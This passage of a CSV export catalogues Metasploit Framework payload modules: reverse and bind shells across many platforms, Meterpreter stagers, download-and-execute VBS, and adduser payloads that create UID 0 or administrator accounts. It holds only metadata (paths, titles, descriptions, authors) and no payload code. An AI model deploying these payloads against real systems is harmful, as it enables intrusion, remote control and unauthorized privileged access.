Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape " 2019,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsd/x86/find_tag.rb","payload","bsd/x86/shell/find_tag","payload/bsd/x86/shell/find_tag","BSD Command Shell, Find Tag Stager",300,"Use an established connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape " 2020,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb","payload","bsd/x86/shell/reverse_ipv6_tcp","payload/bsd/x86/shell/reverse_ipv6_tcp","BSD Command Shell, Reverse TCP Stager 
(IPv6)",300,"Connect back to the attacker over IPv6, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , skape , vlad902 "
2021,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsd/x86/reverse_tcp.rb","payload","bsd/x86/shell/reverse_tcp","payload/bsd/x86/shell/reverse_tcp","BSD Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape "
2022,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb","payload","bsd/x86/shell_bind_tcp","payload/bsd/x86/shell_bind_tcp","BSD Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2023,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb","payload","bsd/x86/shell_bind_tcp_ipv6","payload/bsd/x86/shell_bind_tcp_ipv6","BSD Command Shell, Bind TCP Inline (IPv6)",300,"Listen for a connection and spawn a command shell over IPv6","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , skape , vlad902 "
2024,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_find_port.rb","payload","bsd/x86/shell_find_port","payload/bsd/x86/shell_find_port","BSD Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2025,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_find_tag.rb","payload","bsd/x86/shell_find_tag","payload/bsd/x86/shell_find_tag","BSD Command Shell, Find Tag Inline",300,"Spawn a shell on an established connection (proxy/nat safe)","Metasploit Framework License (BSD)","f",,,,,"t",,"skape "
2026,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb","payload","bsd/x86/shell_reverse_tcp","payload/bsd/x86/shell_reverse_tcp","BSD Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2027,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb","payload","bsd/x86/shell_reverse_tcp_ipv6","payload/bsd/x86/shell_reverse_tcp_ipv6","BSD Command Shell, Reverse TCP Inline (IPv6)",300,"Connect back to attacker and spawn a command shell over IPv6","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , skape , vlad902 "
2028,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsdi/x86/bind_tcp.rb","payload","bsdi/x86/shell/bind_tcp","payload/bsdi/x86/shell/bind_tcp","BSDi Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape "
2029,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb","payload","bsdi/x86/shell/reverse_tcp","payload/bsdi/x86/shell/reverse_tcp","BSDi Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape "
2030,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb","payload","bsdi/x86/shell_bind_tcp","payload/bsdi/x86/shell_bind_tcp","BSDi Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"optyx , skape "
2031,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsdi/x86/shell_find_port.rb","payload","bsdi/x86/shell_find_port","payload/bsdi/x86/shell_find_port","BSDi Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"optyx , skape "
2032,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb","payload","bsdi/x86/shell_reverse_tcp","payload/bsdi/x86/shell_reverse_tcp","BSDi Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"optyx , skape "
2033,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_inetd.rb","payload","cmd/unix/bind_inetd","payload/cmd/unix/bind_inetd","Unix Command Shell, Bind TCP (inetd)",300,"Listen for a connection and spawn a command shell (persistent)","Metasploit Framework License (BSD)","t",,,,,"t",,"hdm "
2034,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_netcat.rb","payload","cmd/unix/bind_netcat","payload/cmd/unix/bind_netcat","Unix Command Shell, Bind TCP (via netcat)",300,"Listen for a connection and spawn a command shell via netcat","Metasploit Framework License (BSD)","f",,,,,"t",,"egypt , juan vazquez , m-1-k-3"
2035,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb","payload","cmd/unix/bind_netcat_gaping","payload/cmd/unix/bind_netcat_gaping","Unix Command Shell, Bind TCP (via netcat -e)",300,"Listen for a connection and spawn a command shell via netcat","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2036,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb","payload","cmd/unix/bind_netcat_gaping_ipv6","payload/cmd/unix/bind_netcat_gaping_ipv6","Unix Command Shell, Bind TCP (via netcat -e) IPv6",300,"Listen for a connection and spawn a command shell via netcat","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2037,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_perl.rb","payload","cmd/unix/bind_perl","payload/cmd/unix/bind_perl","Unix Command Shell, Bind TCP (via Perl)",300,"Listen for a connection and spawn a command shell via perl","BSD License","f",,,,,"t",,"Samy , cazz "
2038,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb","payload","cmd/unix/bind_perl_ipv6","payload/cmd/unix/bind_perl_ipv6","Unix Command Shell, Bind TCP (via perl) IPv6",300,"Listen for a connection and spawn a command shell via perl","BSD License","f",,,,,"t",,"Samy , cazz "
2039,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_ruby.rb","payload","cmd/unix/bind_ruby","payload/cmd/unix/bind_ruby","Unix Command Shell, Bind TCP (via Ruby)",300,"Continually listen for a connection and spawn a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn "
2040,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb","payload","cmd/unix/bind_ruby_ipv6","payload/cmd/unix/bind_ruby_ipv6","Unix Command Shell, Bind TCP (via Ruby) IPv6",300,"Continually listen for a connection and spawn a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn "
2041,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/generic.rb","payload","cmd/unix/generic","payload/cmd/unix/generic","Unix Command, Generic Command Execution",300,"Executes the supplied command","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2042,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/interact.rb","payload","cmd/unix/interact","payload/cmd/unix/interact","Unix Command, Interact with Established Connection",300,"Interacts with a shell on an established socket connection","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2043,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse.rb","payload","cmd/unix/reverse","payload/cmd/unix/reverse","Unix Command Shell, Double reverse TCP (telnet)",300,"Creates an interactive shell through two inbound connections","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2044,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_bash.rb","payload","cmd/unix/reverse_bash","payload/cmd/unix/reverse_bash","Unix Command Shell, Reverse TCP (/dev/tcp)",300,"Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2045,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb","payload","cmd/unix/reverse_bash_telnet_ssl","payload/cmd/unix/reverse_bash_telnet_ssl","Unix Command Shell, Reverse TCP SSL (telnet)",300,"Creates an interactive shell via mknod and telnet. This method works on Debian and other systems compiled without /dev/tcp support. 
This module uses the '-z' option included on some systems to encrypt using SSL.","Metasploit Framework License (BSD)","f",,,,,"t",,"RageLtMan"
2046,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_netcat.rb","payload","cmd/unix/reverse_netcat","payload/cmd/unix/reverse_netcat","Unix Command Shell, Reverse TCP (via netcat)",300,"Creates an interactive shell via netcat","Metasploit Framework License (BSD)","f",,,,,"t",,"egypt , juan vazquez , m-1-k-3"
2047,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb","payload","cmd/unix/reverse_netcat_gaping","payload/cmd/unix/reverse_netcat_gaping","Unix Command Shell, Reverse TCP (via netcat -e)",300,"Creates an interactive shell via netcat","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2048,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_openssl.rb","payload","cmd/unix/reverse_openssl","payload/cmd/unix/reverse_openssl","Unix Command Shell, Double reverse TCP SSL (openssl)",300,"Creates an interactive shell through two inbound connections","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2049,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_perl.rb","payload","cmd/unix/reverse_perl","payload/cmd/unix/reverse_perl","Unix Command Shell, Reverse TCP (via Perl)",300,"Creates an interactive shell via perl","BSD License","f",,,,,"t",,"cazz "
2050,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb","payload","cmd/unix/reverse_perl_ssl","payload/cmd/unix/reverse_perl_ssl","Unix Command Shell, Reverse TCP SSL (via perl)",300,"Creates an interactive shell via perl, uses SSL","BSD License","f",,,,,"t",,"RageLtMan"
2051,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb","payload","cmd/unix/reverse_php_ssl","payload/cmd/unix/reverse_php_ssl","Unix Command Shell, Reverse TCP SSL (via php)",300,"Creates an interactive shell via php, uses SSL","BSD License","f",,,,,"t",,"RageLtMan"
2052,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_python.rb","payload","cmd/unix/reverse_python","payload/cmd/unix/reverse_python","Unix Command Shell, Reverse TCP (via Python)",300,"Connect back and create a command shell via Python","Metasploit Framework License (BSD)","f",,,,,"t",,"Brendan Coles "
2053,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb","payload","cmd/unix/reverse_python_ssl","payload/cmd/unix/reverse_python_ssl","Unix Command Shell, Reverse TCP SSL (via python)",300,"Creates an interactive shell via python, uses SSL, encodes with base64 by design.","BSD License","f",,,,,"t",,"RageLtMan"
2054,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_ruby.rb","payload","cmd/unix/reverse_ruby","payload/cmd/unix/reverse_ruby","Unix Command Shell, Reverse TCP (via Ruby)",300,"Connect back and create a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn "
2055,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb","payload","cmd/unix/reverse_ruby_ssl","payload/cmd/unix/reverse_ruby_ssl","Unix Command Shell, Reverse TCP SSL (via Ruby)",300,"Connect back and create a command shell via Ruby, uses SSL","Metasploit Framework License (BSD)","f",,,,,"t",,"RageLtMan"
2056,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb","payload","cmd/unix/reverse_ssl_double_telnet","payload/cmd/unix/reverse_ssl_double_telnet","Unix Command Shell, Double Reverse TCP SSL (telnet)",300,"Creates an interactive shell through two inbound connections, encrypts using SSL via ""-z"" option","Metasploit Framework License (BSD)","f",,,,,"t",,"RageLtMan, hdm "
2057,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/adduser.rb","payload","cmd/windows/adduser","payload/cmd/windows/adduser","Windows Execute net user /ADD CMD",300,"Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)","Metasploit Framework License (BSD)","f",,,,,"t",,"Chris John Riley, hdm , scriptjunkie"
2058,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/bind_perl.rb","payload","cmd/windows/bind_perl","payload/cmd/windows/bind_perl","Windows Command Shell, Bind TCP (via Perl)",300,"Listen for a connection and spawn a command shell via perl (persistent)","BSD License","f",,,,,"t",,"Samy , cazz , patrick "
2059,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb","payload","cmd/windows/bind_perl_ipv6","payload/cmd/windows/bind_perl_ipv6","Windows Command Shell, Bind TCP (via perl) IPv6",300,"Listen for a connection and spawn a command shell via perl (persistent)","BSD License","f",,,,,"t",,"Samy , cazz , patrick "
2060,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/bind_ruby.rb","payload","cmd/windows/bind_ruby","payload/cmd/windows/bind_ruby","Windows Command Shell, Bind TCP (via Ruby)",300,"Continually listen for a connection and spawn a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn "
2061,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/download_eval_vbs.rb","payload","cmd/windows/download_eval_vbs","payload/cmd/windows/download_eval_vbs","Windows Executable Download and Evaluate VBS",300,"Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line.","BSD License","f",,,,,"t",,"scriptjunkie"
2062,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/download_exec_vbs.rb","payload","cmd/windows/download_exec_vbs","payload/cmd/windows/download_exec_vbs","Windows Executable Download and Execute (via .vbs)",300,"Download an EXE from an HTTP(S) URL and execute it","BSD License","f",,,,,"t",,"scriptjunkie"
2063,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/reverse_perl.rb","payload","cmd/windows/reverse_perl","payload/cmd/windows/reverse_perl","Windows Command, Double reverse TCP connection (via Perl)",300,"Creates an interactive shell via perl","BSD License","f",,,,,"t",,"cazz , patrick "
2064,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/reverse_ruby.rb","payload","cmd/windows/reverse_ruby","payload/cmd/windows/reverse_ruby","Windows Command Shell, Reverse TCP (via Ruby)",300,"Connect back and create a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn "
2065,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/generic/custom.rb","payload","generic/custom","payload/generic/custom","Custom Payload",300,"Use custom string or file as payload. 
Set either PAYLOADFILE or PAYLOADSTR.","Metasploit Framework License (BSD)","f",,,,,"t",,"scriptjunkie "
2066,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/generic/debug_trap.rb","payload","generic/debug_trap","payload/generic/debug_trap","Generic x86 Debug Trap",300,"Generate a debug trap in the target process","Metasploit Framework License (BSD)","f",,,,,"t",,"robert "
2067,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/generic/shell_bind_tcp.rb","payload","generic/shell_bind_tcp","payload/generic/shell_bind_tcp","Generic Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"skape "
2068,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/generic/shell_reverse_tcp.rb","payload","generic/shell_reverse_tcp","payload/generic/shell_reverse_tcp","Generic Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"skape "
2069,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/generic/tight_loop.rb","payload","generic/tight_loop","payload/generic/tight_loop","Generic x86 Tight Loop",300,"Generate a tight loop in the target process","Metasploit Framework License (BSD)","f",,,,,"t",,"jduck "
2070,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/java/jsp_shell_bind_tcp.rb","payload","java/jsp_shell_bind_tcp","payload/java/jsp_shell_bind_tcp","Java JSP Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"sf "
2071,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb","payload","java/jsp_shell_reverse_tcp","payload/java/jsp_shell_reverse_tcp","Java JSP Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"sf "
2072,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/bind_tcp.rb","payload","java/meterpreter/bind_tcp","payload/java/meterpreter/bind_tcp","Java Meterpreter, Java Bind TCP Stager",300,"Listen for a connection, Run a meterpreter server in Java","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi"
2073,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/reverse_http.rb","payload","java/meterpreter/reverse_http","payload/java/meterpreter/reverse_http","Java Meterpreter, Java Reverse HTTP Stager",300,"Tunnel communication over HTTP, Run a meterpreter server in Java","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , hdm , mihi"
2074,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/reverse_https.rb","payload","java/meterpreter/reverse_https","payload/java/meterpreter/reverse_https","Java Meterpreter, Java Reverse HTTPS Stager",300,"Tunnel communication over HTTPS, Run a meterpreter server in Java","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , hdm , mihi"
2075,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/reverse_tcp.rb","payload","java/meterpreter/reverse_tcp","payload/java/meterpreter/reverse_tcp","Java Meterpreter, Java Reverse TCP Stager",300,"Connect back stager, Run a meterpreter server in Java","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi"
2076,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/bind_tcp.rb","payload","java/shell/bind_tcp","payload/java/shell/bind_tcp","Command Shell, Java Bind TCP Stager",300,"Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi"
2077,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/java/reverse_tcp.rb","payload","java/shell/reverse_tcp","payload/java/shell/reverse_tcp","Command Shell, Java Reverse TCP Stager",300,"Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi"
2078,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/java/shell_reverse_tcp.rb","payload","java/shell_reverse_tcp","payload/java/shell_reverse_tcp","Java Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"egypt , mihi"
2079,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/armle/adduser.rb","payload","linux/armle/adduser","payload/linux/armle/adduser","Linux Add User",300,"Create a new user with UID 0","Metasploit Framework License (BSD)","t",,,,,"t",,"Jonathan Salwan"
2080,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/armle/exec.rb","payload","linux/armle/exec","payload/linux/armle/exec","Linux Execute Command",300,"Execute an arbitrary command","Metasploit Framework License (BSD)","f",,,,,"t",,"Jonathan Salwan"
2081,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/armle/shell_bind_tcp.rb","payload","linux/armle/shell_bind_tcp","payload/linux/armle/shell_bind_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect to target and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"civ, hal"
2082,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb","payload","linux/armle/shell_reverse_tcp","payload/linux/armle/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"civ"
2083,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb","payload","linux/mipsbe/shell_reverse_tcp","payload/linux/mipsbe/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Julien Tinnes"
2084,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb","payload","linux/mipsle/shell_bind_tcp","payload/linux/mipsle/shell_bind_tcp","Linux Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Vlatko Kosturjak"
2085,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb","payload","linux/mipsle/shell_reverse_tcp","payload/linux/mipsle/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Julien Tinnes"
2086,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb","payload","linux/ppc/shell_bind_tcp","payload/linux/ppc/shell_bind_tcp","Linux Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2087,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc/shell_find_port.rb","payload","linux/ppc/shell_find_port","payload/linux/ppc/shell_find_port","Linux Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2088,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb","payload","linux/ppc/shell_reverse_tcp","payload/linux/ppc/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2089,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb","payload","linux/ppc64/shell_bind_tcp","payload/linux/ppc64/shell_bind_tcp","Linux Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2090,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc64/shell_find_port.rb","payload","linux/ppc64/shell_find_port","payload/linux/ppc64/shell_find_port","Linux Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2091,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb","payload","linux/ppc64/shell_reverse_tcp","payload/linux/ppc64/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle "
2092,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x64/exec.rb","payload","linux/x64/exec","payload/linux/x64/exec","Linux Execute Command",300,"Execute an arbitrary command","Metasploit Framework License (BSD)","f",,,,,"t",,"ricky"
2093,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x64/bind_tcp.rb","payload","linux/x64/shell/bind_tcp","payload/linux/x64/shell/bind_tcp","Linux Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ricky"
2094,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x64/reverse_tcp.rb","payload","linux/x64/shell/reverse_tcp","payload/linux/x64/shell/reverse_tcp","Linux Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ricky"
2095,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x64/shell_bind_tcp.rb","payload","linux/x64/shell_bind_tcp","payload/linux/x64/shell_bind_tcp","Linux Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"ricky"
2096,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x64/shell_find_port.rb","payload","linux/x64/shell_find_port","payload/linux/x64/shell_find_port","Linux Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"mak"
2097,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb","payload","linux/x64/shell_reverse_tcp","payload/linux/x64/shell_reverse_tcp","Linux Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"ricky"
2098,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/adduser.rb","payload","linux/x86/adduser","payload/linux/x86/adduser","Linux Add User",300,"Create a new user with UID 0","Metasploit Framework License (BSD)","t",,,,,"t",,"skape , spoonm , vlad902 "
2099,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/chmod.rb","payload","linux/x86/chmod","payload/linux/x86/chmod","Linux Chmod",300,"Runs chmod on specified file with specified mode","BSD License","f",,,,,"t",,"kris katterjohn "
2100,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/linux/x86/exec.rb","payload","linux/x86/exec","payload/linux/x86/exec","Linux Execute Command",300,"Execute an arbitrary command","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 "
2101,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb","payload","linux/x86/meterpreter/bind_ipv6_tcp","payload/linux/x86/meterpreter/bind_ipv6_tcp","Linux Meterpreter, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Staged meterpreter server","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"PKS, egypt , kris katterjohn "
